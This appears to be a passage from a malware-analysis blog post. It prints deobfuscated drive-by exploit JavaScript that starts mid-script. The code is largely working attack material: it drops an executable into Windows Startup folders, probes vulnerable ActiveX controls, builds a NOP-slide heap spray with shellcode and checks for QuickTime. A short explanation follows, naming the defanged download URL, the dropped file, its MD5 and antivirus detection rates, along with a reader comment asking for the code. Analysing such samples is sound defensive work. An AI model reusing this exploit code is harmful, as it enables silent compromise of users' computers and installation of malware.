if(fn2==”"){try{Tv=hdrv;fn=Tv+stds+stau+”Menu Start\\Programma\\’s\\Opstarten”+stfln;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+stds+stau+”Menu Start\\Programy\\Autostart”+stfln;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+stds+stau+”Menu Avvio\\Programmi\\Esecuzione automatica”+stfln;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+stds+stau+”Kaynnista-valikko\\Ohjelmat\\Kaynnistys”+stfln;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+stds+stau+”Start Menu\\Programlar\\BASLANGIC”+stfln;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+stds+stau+”Start-meny\\Programmer\\Oppstart”+stfln;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+stds+stau+”Start-menyn\\Program\\Autostart”+stfln;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+stds+stau+”Menu Iniciar\\Programas\\Iniciar”+stfln;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+”\\Dokumente und Einstellungen\\”+stau+”Startmenu\\Programme\\
Autostart”+stfln;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+stds+stau+”Start Menu\\Programs\\Startup”+stfln;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=dtemp;fn=Tv+”\\tmp”+strnd+”.exe”;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+”\\sys”+strnd+”.exe”;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+”\\RECYCLER\\”+strnd+”.exe”;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+”\\RECYCLED\\”+strnd+”.exe”;eval(ev2);}catch(e){};};
if (fn2!=”"){try{var obj_shl=objmker(pt31,”Shell.Application”);obj_shl.ShellExecute(fn2);}catch(e){try
{obj_WScript.Exec(fn2);}catch(e){try{var tobjst=space; var
obj2mk=”demoobj”+tobjst+”.innerHTML”+tobjst+”=demoobj”+tobjst+”.innerHTML”+tobjst+”+\
“<object”+tobjst+” classid”+tobjst+”=’clsid:”+tobjst+”527196a4-b1a3-4647-931d-37ba5af23037″+tobjst+”‘ codebase=”+tobjst+”‘\”+fn2+\”‘></”+tobjst+”object>\”;”;eval(obj2mk);}catch(e){return 0;};};};return 1;}else{return 0;};
}else{return 0;};
};
function objmker(pt21,pt22) {
var tds=27; var nobj=null; var stno=”nobj=pt21.”;
try{eval(stno+’CreateObject(pt22)’);}catch(e){}
if(!nobj){try{eval(stno+’CreateObject(pt22,”")’);}catch(e){}}
if(!nobj){try{eval(stno+’CreateObject(pt22,”",”")’);}catch(e){}}
if(!nobj){try{eval(stno+’GetObject(“”,pt22)’);}catch(e){}}
if(!nobj){try{eval(stno+’GetObject(pt22,”")’);}catch(e){}}
if(!nobj){try{eval(stno+’GetObject(pt22)’);}catch(e){}}
return(nobj);
}
var tds=17; var i=0; var stcb1=”-0000-0000-C000-000000000046″; var st1m=”1-”; var stm1=”-1″;
var hncx=new Array(“BD96C556-65A3″+stm1+”1D0-983A-00C04FC29E36″,”AB9BCEDD-EC7E-47E”+
st1m+”9322-D4A210617116″,”0006F033″+stcb1,”0006F03A”+stcb1,”6E32070A-766D-4EE6-879C
-DC1FA91D2FC3″,”6414512B-B978-451D-A0D8-FCFDF33E833C”,”7F5B7F63-F06F-433″+st1m+
“8A26-339E03C0AE3D”,”06723E09-F4C2-43c8-8358-09FCD1DB0766″,”639F725F”+stm1+
“B2D-483″+st1m+”A9FD-874847682010″,”BA018599″+stm1+”DB3-44f9-83B4-461454C84BF8″,
“D0C07D56-7C69-43F”+st1m+”B4A0-25F5A11FAB19″,”E8CCCDDF-CA28-496b-B050-6C07C962476B”,
null); var stob=”object”; var stid=”id”; var strd=”obj_RDS”; var iuump=null; while (hncx[i]) {
iuump=null;iuump=document.createElement(stob);iuump.setAttribute(stid,strd+i);iuump.setAttribute(
“class”+stid,”cls”+stid+”:”+hncx[i]); if(iuump){try{if(lsrn(iuump)){break;};}catch(e){};}; i++;}
var shs=unescape(shsb);
var noplen = 0×400000-(shs.length*2+0×38);
var nops4m=unescape(“%u9090″); while (nops4m.length*2<noplen) nops4m+=nops4m; nops4m=
nops4m.substring(0,noplen/2); arr188m=new Array(); for(i=0;i<47;i++){arr188m[i]=nops4m+shs;};
var tobjst2=space;var haveqt=false;var chkqt=’ <sc’+'ript language=”VB’+’script”> \n On Error Resume Next \n Set theObject=CreateObject(“QuickTimeCheckObject.QuickTimeCheck.1″) \n On Error goto 0 \n If
IsObject(theObject) Then \n If theObject.IsQuickTimeAvailable(0) Then \’Just check for file\’ \n
haveqt=1 \n End If \n End If \n </scr’ + ‘ipt> \n’; var obj1mk=”document.”+tobjst2+”writeln”+
tobjst2+”(chkqt);”;eval(obj1mk);
This will basically exploit the computer and creates the file on your computer ‘c:\documents and settings\all users\msupd_0809_upd070148.exe’ from ‘hxxp://inetppui.com/files/2440/f8ae8aedaf494548b681dedb37dd3d5f/’ on the computer.
(Click picture for video of the exploit)
Download in .wmv
msupd_0809_upd070148.exe
Result: 8/36 (22.23%)
MD5: 44641bb1fc3e0443e8c2222a69af6cc9
VirusTotal
ThreatExpert Analysis
Hello!
Could you please send me the deobfuscated code to busin3ss [at] gmail [dot] com. This would be an excellent example for a PDF that I’m creating, but all the single and double quotes are messed up.
Thanks in advanced!
Here is a link to the entire post in .txt format.
http://malwaredb.djpnuemo.com/quicktime.txt (Right-click and save)